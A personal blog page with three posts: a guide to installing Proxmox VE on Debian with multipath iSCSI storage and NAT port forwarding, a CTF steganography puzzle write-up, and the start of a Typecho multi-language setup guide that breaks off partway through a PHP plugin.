Kagura iYoRoy has written a total of 31 articles and received 23 comments.
An Experience of Manually Installing Proxmox VE, Configuring Multipath iSCSI, and NAT Forwarding
The reason was that I rented a physical server, but the IDC did not provide Proxmox VE or Debian system images, only Ubuntu, CentOS, and Windows. In addition, the data disk was provided via multipath iSCSI. I wanted to use PVE to isolate different usage scenarios, so I attempted to reinstall the system and migrate the configuration described below.

Backup Configuration

First, a general check of the system reveals:

- The system has two network interfaces: enp24s0f0 carries a public IP address for external access; enp24s0f1 carries the private address 192.168.128.153.
- The data disk is mapped to /dev/mapper/mpatha.
- Under /etc/iscsi there are configurations for two iSCSI nodes, 192.168.128.250:3260 and 192.168.128.252:3260, both pointing to the same target iqn.2024-12.com.ceph:iscsi.

It can be inferred that the data disk is attached by logging into both iSCSI nodes and then merging them into a single device with multipath.

Check the system's network configuration:

```yaml
network:
  version: 2
  renderer: networkd
  ethernets:
    enp24s0f0:
      addresses: [211.154.[REDACTED]/24]
      routes:
        - to: default
          via: [REDACTED]
      match:
        macaddress: ac:1f:6b:0b:e2:d4
      set-name: enp24s0f0
      nameservers:
        addresses:
          - 114.114.114.114
          - 8.8.8.8
    enp24s0f1:
      addresses:
        - 192.168.128.153/17
      match:
        macaddress: ac:1f:6b:0b:e2:d5
      set-name: enp24s0f1
```

It turns out to be very simple static addressing; the internal interface doesn't even have a default route, just binding the IP is enough. Then save the iSCSI configuration files from /etc/iscsi, which include the account and password information.

Reinstall Debian

I used the bin456789/reinstall script for this reinstallation. Download the script:

```shell
curl -O https://cnb.cool/bin456789/reinstall/-/git/raw/main/reinstall.sh || wget -O ${_##*/} $_
```

Reinstall as Debian 13 (Trixie):

```shell
bash reinstall.sh debian 13
```

Then enter the password you want to set when prompted.
If all goes well, after about 10 minutes it will automatically finish and reboot into a clean Debian 13. During the process you can connect via SSH with the password you set to check the installation progress. After reinstalling, switch the apt sources and run an apt upgrade as usual to get a clean, up-to-date Debian 13. For changing sources, refer directly to the USTC Mirror Site tutorial.

Install Proxmox VE

This step mainly follows the official Proxmox tutorial.

Note: the Debian installed by the script above sets the hostname to localhost. If you want to change it, do so before configuring the hostname below, and put your new hostname in /etc/hosts instead of localhost.

Configure Hostname

Proxmox VE requires the current hostname to resolve to a non-loopback IP address. As the official docs put it: "The hostname of your machine must be resolvable to an IP address. This IP address must not be a loopback one like 127.0.0.1 but one that you and other hosts can connect to."

For example, my server IP is 211.154.[CENSORED], so I add the following record to /etc/hosts:

```diff
 127.0.0.1 localhost
+211.154.[CENSORED] localhost
 ::1 localhost ip6-localhost ip6-loopback
 ff02::1 ip6-allnodes
 ff02::2 ip6-allrouters
```

After saving, run hostname --ip-address and check that it outputs the non-loopback address you set: ::1 127.0.0.1 211.154.[CENSORED].

Add the Proxmox VE Software Repository

Debian 13 uses the Deb822 format (though you can still use sources.list if you prefer), so just follow the USTC Proxmox mirror instructions:

```shell
cat > /etc/apt/sources.list.d/pve-no-subscription.sources <<EOF
Types: deb
URIs: https://mirrors.ustc.edu.cn/proxmox/debian/pve
Suites: trixie
Components: pve-no-subscription
Signed-By: /usr/share/keyrings/proxmox-archive-keyring.gpg
EOF
```

A keyring also needs to be migrated here, but I couldn't find one online, so I chose to pull a copy from an existing Proxmox VE server.
It's available here: proxmox-keyrings.zip. Extract the public key file into /usr/share/keyrings/, then run:

```shell
apt update
apt upgrade -y
```

This syncs the Proxmox VE software repository.

Install the Proxmox VE Kernel

Install the PVE kernel and reboot to apply it:

```shell
apt install proxmox-default-kernel
reboot
```

Afterwards, uname -r should show a kernel version ending in pve, such as 6.17.2-2-pve, indicating the new kernel is active.

Install the Proxmox VE Packages

Install the corresponding packages with apt:

```shell
apt install proxmox-ve postfix open-iscsi chrony
```

During configuration you will be asked to set up the postfix mail server. The official explanation: if you have a mail server in your network, configure postfix as a satellite system; your existing mail server will then be the relay host that routes the emails sent by Proxmox VE to their final recipient. If you don't know what to enter here, choose "local only" and leave the system name as is.

After this, you should be able to reach the web console at https://<your server address>:8006. The account is root and the password is your root password, i.e., the one configured during the Debian reinstallation.

Remove the Old Debian Kernel and os-prober

```shell
apt remove linux-image-amd64 'linux-image-6.1*'
update-grub
apt remove os-prober
```

This removes the old Debian kernel, updates GRUB, and removes os-prober. Removing os-prober is not mandatory, but the official guide recommends it because os-prober may mistake VM boot files for multi-boot entries and add incorrect items to the boot menu.

At this point the Proxmox VE installation is complete and ready for normal use!

Configure the Internal Network Interface

Because the iSCSI interface and the public interface are different, and the reinstallation lost this configuration, the internal network interface must be configured manually.
Open the Proxmox VE web interface, go to Datacenter, then localhost (the hostname), then Network. Edit the internal interface (ens6f1 here), enter the backed-up IPv4 address in CIDR form, 192.168.128.153/17, check Autostart, and save. Then bring the interface up:

```shell
ip link set ens6f1 up
```

You should now be able to ping the internal iSCSI server's IP.

Configure the iSCSI Data Disk

The previous step already installed the open-iscsi package that provides iscsiadm, so we just need to recreate the nodes from the backed-up configuration. First, discover the iSCSI storage:

```shell
iscsiadm -m discovery -t st -p 192.168.128.250:3260
```

This should return the two original LUN targets:

```
192.168.128.250:3260,1 iqn.2024-12.com.ceph:iscsi
192.168.128.252:3260,2 iqn.2024-12.com.ceph:iscsi
```

Transfer the backed-up configuration files to the server, overwriting the existing contents of /etc/iscsi. In my backup I also found the authentication configuration:

```
# /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.250,3260,1/default
# BEGIN RECORD 2.1.5
node.name = iqn.2024-12.com.ceph:iscsi
... # Some unimportant configuration omitted
node.session.auth.authmethod = CHAP
node.session.auth.username = [CENSORED]
node.session.auth.password = [CENSORED]
node.session.auth.chap_algs = MD5
... # Some unimportant configuration omitted

# /etc/iscsi/nodes/iqn.2024-12.com.ceph:iscsi/192.168.128.252,3260,2/default
# BEGIN RECORD 2.1.5
node.name = iqn.2024-12.com.ceph:iscsi
... # Some unimportant configuration omitted
node.session.auth.authmethod = CHAP
node.session.auth.username = [CENSORED]
node.session.auth.password = [CENSORED]
node.session.auth.chap_algs = MD5
... # Some unimportant configuration omitted
```

Write these settings into the new system:

```shell
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.authmethod -v CHAP
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.username -v [CENSORED]
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.password -v [CENSORED]
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.session.auth.chap_algs -v MD5

iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.authmethod -v CHAP
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.username -v [CENSORED]
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.password -v [CENSORED]
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.session.auth.chap_algs -v MD5
```

(I don't know why the auth info has to be written again separately, but testing shows the login fails without rewriting it.)

Then log into the targets:

```shell
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 --login
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 --login
```

And enable automatic login on boot:

```shell
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.250:3260 -o update -n node.startup -v automatic
iscsiadm -m node -T iqn.2024-12.com.ceph:iscsi -p 192.168.128.252:3260 -o update -n node.startup -v automatic
```

At this point, checking the disks with a tool like lsblk should reveal two additional drives; in my case, sdb and sdc appeared.
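The eight near-identical auth update commands can also be collapsed into a loop. A dry-run sketch (my refactor, not from the original post; CHAP_USER and CHAP_PASS are placeholders for the censored credentials, and it prints the commands instead of executing them):

```shell
# Dry-run sketch: prints the iscsiadm commands that would set CHAP auth on
# both portals. CHAP_USER/CHAP_PASS are placeholders, not the real credentials.
TARGET="iqn.2024-12.com.ceph:iscsi"
CHAP_USER="user"
CHAP_PASS="pass"

gen_auth_cmds() {
  for portal in 192.168.128.250:3260 192.168.128.252:3260; do
    for pair in "authmethod CHAP" "username $CHAP_USER" \
                "password $CHAP_PASS" "chap_algs MD5"; do
      set -- $pair
      echo "iscsiadm -m node -T $TARGET -p $portal -o update" \
           "-n node.session.auth.$1 -v $2"
    done
  done
}
gen_auth_cmds
```

Piping the output to sh would apply the settings for real.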
Configure Multipath

To check whether this is a multipath device, I compared the SCSI IDs of the two disks:

```shell
/usr/lib/udev/scsi_id --whitelisted --device=/dev/sdb
/usr/lib/udev/scsi_id --whitelisted --device=/dev/sdc
```

The two IDs were identical, confirming that they are the same disk exposed over multiple paths for load balancing and failover.

Install multipath-tools with apt:

```shell
apt install multipath-tools
```

Then create /etc/multipath.conf with:

```
defaults {
    user_friendly_names yes
    find_multipaths yes
}
```

Start multipathd and enable it on boot:

```shell
systemctl start multipathd
systemctl enable multipathd
```

Then scan and list the automatically configured multipath device:

```shell
multipath -ll
```

It should output something like:

```
mpatha (360014056229953ef442476e85501bfd7) dm-0 LIO-ORG,TCMU device
size=500G features='1 queue_if_no_path' hwhandler='1 alua' wp=rw
|-+- policy='service-time 0' prio=50 status=active
| `- 14:0:0:152 sdb 8:16 active ready running
`-+- policy='service-time 0' prio=50 status=active
  `- 14:0:0:152 sdc 8:16 active ready running
```

This shows the two disks have been recognized as a single multipath device. You can now find the aggregated disk under /dev/mapper/:

```
root@localhost:/dev/mapper# ls
control  mpatha
```

mpatha is the multipath-aggregated disk. If it isn't detected, try rescanning the SCSI bus with:

```shell
rescan-scsi-bus.sh
```

and check again. If the command is not found, install it with apt install sg3-utils. If all else fails, just reboot.

Configure Proxmox VE to Use the Data Disk

Because we use multipath, we cannot simply add an iSCSI-type storage. Create the PV and VG with:

```shell
pvcreate /dev/mapper/mpatha
vgcreate <vg name> /dev/mapper/mpatha
```

Here I used the entire disk as a PV; you could also create a dedicated partition instead. When done, open the Proxmox VE management interface, go to Datacenter, then Storage, click Add, then LVM, select the VG you just created as the Volume group, give it an ID (a name), and click Add.
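The scsi_id comparison earlier reduces to a plain string check. A minimal sketch (my illustration, using the WWID shown in the multipath -ll output as sample data):

```shell
# Minimal sketch of the identity check: two block devices belong to the same
# LUN when their scsi_id output is identical and non-empty.
same_lun() { [ -n "$1" ] && [ "$1" = "$2" ]; }

# Sample IDs; in practice these come from
#   /usr/lib/udev/scsi_id --whitelisted --device=/dev/sdX
id_b="360014056229953ef442476e85501bfd7"
id_c="360014056229953ef442476e85501bfd7"

same_lun "$id_b" "$id_c" && echo "same LUN, safe to multipath"
```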
At this point, all configuration from the original system has been migrated.

Configure NAT and Port Forwarding

NAT

Because only one IPv4 address was purchased, NAT must be configured so that all VMs can reach the internet. Open /etc/network/interfaces and add:

```
auto vmbr0
iface vmbr0 inet static
    address 192.168.100.1
    netmask 255.255.255.0
    bridge_ports none
    bridge_stp off
    bridge_fd 0
    post-up   echo 1 > /proc/sys/net/ipv4/ip_forward
    post-up   iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE
    post-up   iptables -t raw -I PREROUTING -i fwbr+ -j CT --zone 1
    post-up   iptables -A FORWARD -i vmbr0 -j ACCEPT
    post-down iptables -t nat -D POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE
    post-down iptables -t raw -D PREROUTING -i fwbr+ -j CT --zone 1
    post-down iptables -D FORWARD -i vmbr0 -j ACCEPT
```

Here vmbr0 is the NAT bridge for the 192.168.100.0/24 segment. Outgoing traffic from this segment is translated to the IP of the external interface ens6f0, and replies are translated back to the original IP, so the single public IP is shared. Then reload the configuration:

```shell
ifreload -a
```

The VMs should now be able to access the internet: during installation, just configure a static IP in the 192.168.100.0/24 range, set the default gateway to 192.168.100.1, and configure a DNS address.

Port Forwarding

I got lazy and just prompted an AI for this part.
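One caveat worth noting (my addition, not part of the original setup): the post-up echo enables IP forwarding only when vmbr0 comes up. A common alternative is to persist it with a sysctl drop-in, assuming a file name like 99-vm-nat.conf:

```
# /etc/sysctl.d/99-vm-nat.conf  (assumed file name)
net.ipv4.ip_forward = 1
```

Run sysctl --system afterwards to apply it without a reboot.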
Had an AI write a management script, /usr/local/bin/natmgr:

```bash
#!/bin/bash

# =================Configuration Area=================
# Public network interface name (modify according to your actual situation)
PUB_IF="ens6f0"
# ====================================================

ACTION=$1
ARG1=$2
ARG2=$3
ARG3=$4
ARG4=$5

# Check if running as root
if [ "$EUID" -ne 0 ]; then
    echo "Please run this script with root privileges"
    exit 1
fi

# Generate random ID (6 characters)
generate_id() {
    # Mix in nanoseconds and a random salt so IDs stay unique even if the
    # script is invoked several times in quick succession
    echo "$RANDOM $(date +%s%N)" | md5sum | head -c 6
}

# Show help information
usage() {
    echo "Usage: $0 {add|del|list|save} [parameters]"
    echo ""
    echo "Commands:"
    echo "  add <Public Port> <Internal IP> <Internal Port> [Protocol]  Add forwarding rule"
    echo "      [Protocol] optional: tcp, udp, both (default: both)"
    echo "  del <ID>      Delete forwarding rule by ID"
    echo "  list          View all current forwarding rules"
    echo "  save          Save current rules to persist after reboot (Must run!)"
    echo ""
    echo "Examples:"
    echo "  $0 add 8080 192.168.100.101 80 both"
    echo "  $0 save"
    echo ""
}

# Internal function: add a single-protocol rule
_add_single_rule() {
    local PROTO=$1
    local L_PORT=$2
    local T_IP=$3
    local T_PORT=$4
    local RULE_ID=$(generate_id)
    local COMMENT="NAT_ID:${RULE_ID}"

    # 1. Add DNAT rule (PREROUTING chain)
    iptables -t nat -A PREROUTING -i $PUB_IF -p $PROTO --dport $L_PORT -j DNAT --to-destination $T_IP:$T_PORT -m comment --comment "$COMMENT"

    # 2. Add FORWARD rule (allow packet passage)
    iptables -A FORWARD -p $PROTO -d $T_IP --dport $T_PORT -m comment --comment "$COMMENT" -j ACCEPT

    # Output result
    printf "%-10s %-10s %-10s %-20s %-10s\n" "$RULE_ID" "$PROTO" "$L_PORT" "$T_IP:$T_PORT" "Success"

    # Remind user to save
    echo "Please run '$0 save' to ensure rules persist after reboot."
}

# Main add function
add_rule() {
    local L_PORT=$1
    local T_IP=$2
    local T_PORT=$3
    local PROTO_REQ=${4:-both}   # Default to both

    if [[ -z "$L_PORT" || -z "$T_IP" || -z "$T_PORT" ]]; then
        echo "Error: Missing parameters"
        usage
        exit 1
    fi

    # Convert to lowercase
    PROTO_REQ=$(echo "$PROTO_REQ" | tr '[:upper:]' '[:lower:]')

    echo "Adding rule..."
    printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Status"
    echo "------------------------------------------------------------------"
    if [[ "$PROTO_REQ" == "tcp" ]]; then
        _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT"
    elif [[ "$PROTO_REQ" == "udp" ]]; then
        _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT"
    elif [[ "$PROTO_REQ" == "both" ]]; then
        _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT"
        _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT"
    else
        echo "Error: Unsupported protocol '$PROTO_REQ'. Please use tcp, udp, or both."
        exit 1
    fi
    echo "------------------------------------------------------------------"
}

# Delete rule (delete in reverse line-number order)
del_rule() {
    local RULE_ID=$1
    if [[ -z "$RULE_ID" ]]; then
        echo "Error: Please provide rule ID"
        usage
        exit 1
    fi

    echo "Searching for rule with ID [${RULE_ID}]..."
    local FOUND=0

    # --- Clean NAT table (PREROUTING) ---
    LINES=$(iptables -t nat -nL PREROUTING --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn)
    if [[ ! -z "$LINES" ]]; then
        for line in $LINES; do
            iptables -t nat -D PREROUTING $line
            echo "Deleted NAT table PREROUTING chain line $line"
            FOUND=1
        done
    fi

    # --- Clean Filter table (FORWARD) ---
    LINES=$(iptables -t filter -nL FORWARD --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn)
    if [[ ! -z "$LINES" ]]; then
        for line in $LINES; do
            iptables -t filter -D FORWARD $line
            echo "Deleted Filter table FORWARD chain line $line"
            FOUND=1
        done
    fi

    if [[ $FOUND -eq 0 ]]; then
        echo "No rule found with ID $RULE_ID."
    else
        echo "Delete operation completed."
        echo "Please run '$0 save' to update the persistent configuration file."
    fi
}

# Save rules to disk
save_rules() {
    echo "Saving current iptables rules..."
    # netfilter-persistent is the service managing iptables-persistent on Debian/Proxmox
    if command -v netfilter-persistent &> /dev/null; then
        netfilter-persistent save
        if [ $? -eq 0 ]; then
            echo "✅ Rules saved to /etc/iptables/rules.v4; they will be restored automatically after reboot."
        else
            echo "❌ Failed to save rules. Please check the status of the 'netfilter-persistent' service."
        fi
    else
        echo "Warning: 'netfilter-persistent' command not found."
        echo "Please ensure the 'iptables-persistent' package is installed."
        echo "Install command: apt update && apt install iptables-persistent"
    fi
}

# List rules
list_rules() {
    echo "Current Port Forwarding Rules List:"
    printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Target Port"
    echo "------------------------------------------------------------------"
    # Parse iptables output
    iptables -t nat -nL PREROUTING -v | grep "NAT_ID:" | while read line; do
        id=$(echo "$line" | grep -oP '(?<=NAT_ID:)[^ ]*')
        # Extract protocol
        if echo "$line" | grep -q "tcp"; then proto="tcp"; else proto="udp"; fi
        # Extract port after dpt:
        l_port=$(echo "$line" | grep -oP '(?<=dpt:)[0-9]+')
        # Extract IP:Port after to:
        target=$(echo "$line" | grep -oP '(?<=to:).*')
        t_ip=${target%:*}
        t_port=${target#*:}
        printf "%-10s %-10s %-10s %-20s %-10s\n" "$id" "$proto" "$l_port" "$t_ip" "$t_port"
    done
}

# Main logic
case "$ACTION" in
    add)
        add_rule "$ARG1" "$ARG2" "$ARG3" "$ARG4"
        ;;
    del)
        del_rule "$ARG1"
        ;;
    list)
        list_rules
        exit 0
        ;;
    save)
        save_rules
        ;;
    *)
        usage
        exit 1
        ;;
esac
```

This script adds and deletes the iptables rules for port forwarding automatically. Remember to chmod +x it.
Use iptables-persistent to save the configuration and load it automatically at boot:

```shell
apt install iptables-persistent
```

During installation you will be asked whether to save the current rules; either Yes or No is fine.

To add a forwarding rule, use natmgr add <host listen port> <VM internal IP> <VM port> [tcp/udp/both]; the script assigns a unique ID automatically. Use natmgr del <ID> to delete a rule, and natmgr list to view the current forwarding list.

Reference Articles:

- bin456789/reinstall: 一键DD/重装脚本 (One-click reinstall OS on VPS) - GitHub
- Install Proxmox VE on Debian 12 Bookworm - Proxmox VE
- PVE连接 TrueNAS iSCSI存储实现本地无盘化_pve iscsi - CSDN博客
- ProxmoxVE (PVE) NAT 网络配置方法 - Oskyla 烹茶室
29/11/2025
2025 Gujianshan Misc Fruit WriteUp
Open the file in 010 Editor; at the end of the file there is a ZIP header. Extract the archive and open it: there is no password, just a string of Base64:

```
5L2g6L+Z6Iu55p6c5oCO5LmI6L+Z5LmI5aSnCuWkp+S4quWEv+aJjeWAvOmSseS9oOimgeS4jeimgQrov5nmoYPlrZDmgI7kuYjov5nkuYjnoawK56Gs5piv5Zug5Li65paw6bKc5L2g6KaB6L2v55qE6L+Y5piv57Ov55qECui/meilv+eTnOiDveWQg+WQl+eci+i1t+adpeacieeCueS4jeeGnwrkuI3nhp/nmoTopb/nk5zmgI7kuYjlj6/og73kvaDov5nlsLHmmK/nrYnnnYDlkIPnlJznmoQK5L2g6L+Z5p+a5a2Q6L+Z5LmI5bCPCuWwj+W3p+eahOaJjeWlveWQg+S9oOimgeWkp+S4queahOi/mOaYr+WlveWQg+eahArov5nmqZnlrZDmgI7kuYjov5nkuYjphbgK6YW45omN5piv5q2j5a6X55qE5qmZ5a2Q5L2g6KaB5piv55Sc55qE5Y675Yir5a6255yLCui/memmmeiVieacieeCueW8rwrlvK/nmoTpppnolYnmm7TnlJzkvaDkuI3mh4IK5L2g6L+Z5qKo5a2Q5piv5LiN5piv5pyJ54K556GsCuehrOaYr+WboOS4uuaWsOmynOWQg+edgOacieWPo+aEnwrov5nokaHokITmgI7kuYjov5nkuYjlsI8K5bCP55qE6JGh6JCE5pu05rWT57yp55Sc5ZGz
```

Decode it to get:

```
你这苹果怎么这么大
大个儿才值钱你要不要
这桃子怎么这么硬
硬是因为新鲜你要软的还是糯的
这西瓜能吃吗看起来有点不熟
不熟的西瓜怎么可能你这就是等着吃甜的
你这柚子这么小
小巧的才好吃你要大个的还是好吃的
这橙子怎么这么酸
酸才是正宗的橙子你要是甜的去别家看
这香蕉有点弯
弯的香蕉更甜你不懂
你这梨子是不是有点硬
硬是因为新鲜吃着有口感
这葡萄怎么这么小
小的葡萄更浓缩甜味
```

Meanwhile, there is still some unrecognized data at the end of the extracted zip. Based on the bytes 1A 9E 97 BA 2A, it can be inferred that this is OurSecret steganography. Opening it with the OurSecret tool shows that a password is required.
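Spotting that marker can also be scripted. A toy sketch (assuming, as above, that the byte sequence 1A 9E 97 BA 2A identifies OurSecret data; sample.bin is a fabricated example file, not the challenge file):

```shell
# Toy sketch: scan a file for the assumed OurSecret marker bytes 1A 9E 97 BA 2A.
# Build a fabricated sample file containing the marker (octal escapes: \032=0x1A,
# \236=0x9E, \227=0x97, \272=0xBA, \052=0x2A).
printf 'Hi\032\236\227\272\052' > sample.bin

# Hex-dump the file, strip whitespace, and grep for the signature.
if od -An -tx1 sample.bin | tr -d ' \n' | grep -q '1a9e97ba2a'; then
    echo "OurSecret signature found"
fi
```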
Trying the password shuiguo extracts a txt file:

```
你这柚子这么小 你这柚子这么小 你这柚子这么小 你这梨子是不是有点硬 你这柚子这么小 大个儿才值钱你要不要 你这柚子这么小 小巧的才好吃你要大个的还是好吃的 小巧的才好吃你要大个的还是好吃的 弯的香蕉更甜你不懂 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这苹果怎么这么大 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这西瓜能吃吗看起来有点不熟 你这柚子这么小 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这柚子这么小 这西瓜能吃吗看起来有点不熟 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜吃着有口感
```

Each entry corresponds one-to-one with a sentence extracted earlier. Since exactly 16 distinct sentences were extracted, it is reasonable to guess that they represent hexadecimal digits 0-f. Mapping the OurSecret output through that table yields: 666c61677b33653235393630613739646263363962363734636434656336376137326336327d. Write a Python script to convert the hex string to ASCII characters in groups of two:

```python
hex_string = "666c61677b33653235393630613739646263363962363734636434656336376137326336327d"
ascii_string = ''.join([chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2)])
print(ascii_string)
```

This gives the flag: flag{3e25960a79dbc69b674cd4ec67a72c62}
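The mapping step itself is easy to script as well. A toy sketch with placeholder sentences s0..s15 standing in for the sixteen real fruit lines; the index-to-hex-digit logic is the same:

```shell
# Toy sketch of the sentence-to-hex mapping: line i of the 16-line "alphabet"
# becomes hex digit i. Placeholders s0..s15 stand in for the real sentences.
alphabet=$(printf 's%d\n' 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15)

to_hex() {   # reads sentences on stdin, emits one hex digit per line read
    while IFS= read -r line; do
        i=$(printf '%s\n' "$alphabet" | grep -nx -- "$line" | cut -d: -f1)
        printf '%x' $((i - 1))
    done
    echo
}

printf 's6\ns6\ns12\n' | to_hex   # indices 6, 6, 12 -> prints "66c"
```

Feeding the real 76-line OurSecret output through the real alphabet produces the 76-digit hex string decoded above.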
29/11/2025
Configuring a Simple Multi-language Solution for Typecho
I wanted to add internationalization support to my blog, providing a separate English version of every post and page. After searching online, however, I found that Typecho has poor i18n support, so I eventually designed my own solution and am documenting it here. This article assumes some basic understanding of PHP, Nginx, and Typecho's core logic.

Analysis

Requirements

- Provide both a Chinese and an English version of every post and page.
- Provide a language switcher so users can easily change languages on the frontend.
- Make sure search engines correctly identify and index the multi-language versions of the content.

Proposed Solution

There are roughly two ways to distinguish Chinese and English content:

1. Use a separate query parameter, e.g. /?lang=zh-CN and /?lang=en-US. This is relatively difficult to implement and less friendly for search engine indexing.
2. Distinguish via the URL path, e.g. https://<host>/article for the Chinese page and https://<host>/en/article for the English page. This is simpler to configure (essentially two separate Typecho instances) and more search engine friendly; the drawback is that comments and view counts must be synchronized manually.

Weighing the two, I chose the second scheme, implementing multi-language support with a second Typecho instance directly under the /en/ path.

Implementation Plan

- First, duplicate the blog instance into two copies, one Chinese and one English, then translate the English copy.
- Modify the frontend code to implement the language switcher.
- To ensure article URLs on the two sites differ only by the /en prefix, the cid (content ID) of corresponding articles must match. Since cid auto-increments with the order in which posts and attachments are created, I plan to write a sync plugin.
When a post is published on the Chinese site, the plugin automatically inserts a corresponding article with the same cid into the English database.

- Modify the SiteMap plugin. A sitemap cannot contain both page links and references to other sitemaps, so the main site needs two: a main sitemap containing the Chinese pages, and an index sitemap referencing both the Chinese and English sitemaps.
- Add hreflang attributes inside <head></head> to tell search engines how the language variants relate.
- Link the English site's view and like counts to the Chinese database.
- Sync comments between the two instances.

Let's Do It

Create the English Instance

Copy the entire website directory into an /en/ folder under the original web root. Also duplicate the database; I named the new one typecho_en. Next, configure URL rewrite (pseudo-static) rules for both instances:

```nginx
location /en/ {
    if (!-e $request_filename) {
        rewrite ^(.*)$ /en/index.php$1 last;
    }
}

location / {
    if (!-e $request_filename) {
        rewrite ^(.*)$ /index.php$1 last;
    }
}
```

The main Chinese instance's rules are wrapped in a location block because, during testing, I found that without it the English instance could be parsed as part of the Chinese instance, producing 404 errors.

Also point the database configuration in <webroot>/en/config.inc.php at the English instance's database. At this point, visiting <host>/en/ should show a site identical to the main Chinese site.

Change the Typecho Language

This step may be optional, since the frontend language is largely determined by the theme; changing Typecho's backend language isn't strictly necessary, but it helps with consistency (and makes it easy to tell which admin panel you're in!). Simply follow the official Typecho multi-language support repository on GitHub: download the language pack from the Releases page and extract it to <webroot>/en/usr/langs/.
Then navigate to https://<host>/en/admin/options-general.php, where the language setting option should now appear, and change it to English.

Translate the Theme

This is the most tedious step. I use the Joe theme. Go to <webroot>/en/usr/themes/Joe and translate all display-related Chinese text into English. There is no particularly convenient method; machine translation often sounds awkward, so I opted for manual translation. Note that some frontend strings live in JS files, not just in the PHP sources; those need translating too.

Translate the Articles

This step is self-explanatory: translate the articles under /en/ into English one by one and save them.

Configure Synced Publishing

This step keeps the cid synchronized between corresponding articles on the two sites. Since the cid determines the access URL, keeping them in sync simplifies the language switcher later: switching is just adding or removing /en in the URL.

cid is an auto-incrementing primary key in the typecho_contents table, and its assignment is also affected by attachments. Since I plan to upload all attachments to the Chinese site, the cid values could easily drift apart without special handling, creating extra work later. My solution is therefore an AI-assisted plugin that fires when the Chinese site publishes an article: it reads the cid assigned by the Chinese site and writes a corresponding entry into the English site's database.
Create the file <webroot>/usr/plugins/SyncToEnglish/Plugin.php with the following content:

```php
<?php
if (!defined('__TYPECHO_ROOT_DIR__')) exit;

/**
 * Sync Chinese Articles to English Database
 *
 * @package SyncToEnglish
 * @author ChatGPT, iYoRoy
 * @version 1.0.0
 * @link https://example.com
 */
class SyncToEnglish_Plugin implements Typecho_Plugin_Interface
{
    public static function activate()
    {
        Typecho_Plugin::factory('Widget_Contents_Post_Edit')->finishPublish = [__CLASS__, 'push'];
        error_log("[SyncToEnglish] Plugin activated successfully");
        return 'SyncToEnglish plugin activated: empty corresponding articles will be created automatically in the English database when Chinese articles are published.';
    }

    public static function deactivate()
    {
        return 'SyncToEnglish plugin deactivated';
    }

    public static function config(Typecho_Widget_Helper_Form $form)
    {
        $host = new Typecho_Widget_Helper_Form_Element_Text('host', NULL, 'localhost', _t('English DB Host'));
        $user = new Typecho_Widget_Helper_Form_Element_Text('user', NULL, 'root', _t('English DB Username'));
        $password = new Typecho_Widget_Helper_Form_Element_Password('password', NULL, NULL, _t('English DB Password'));
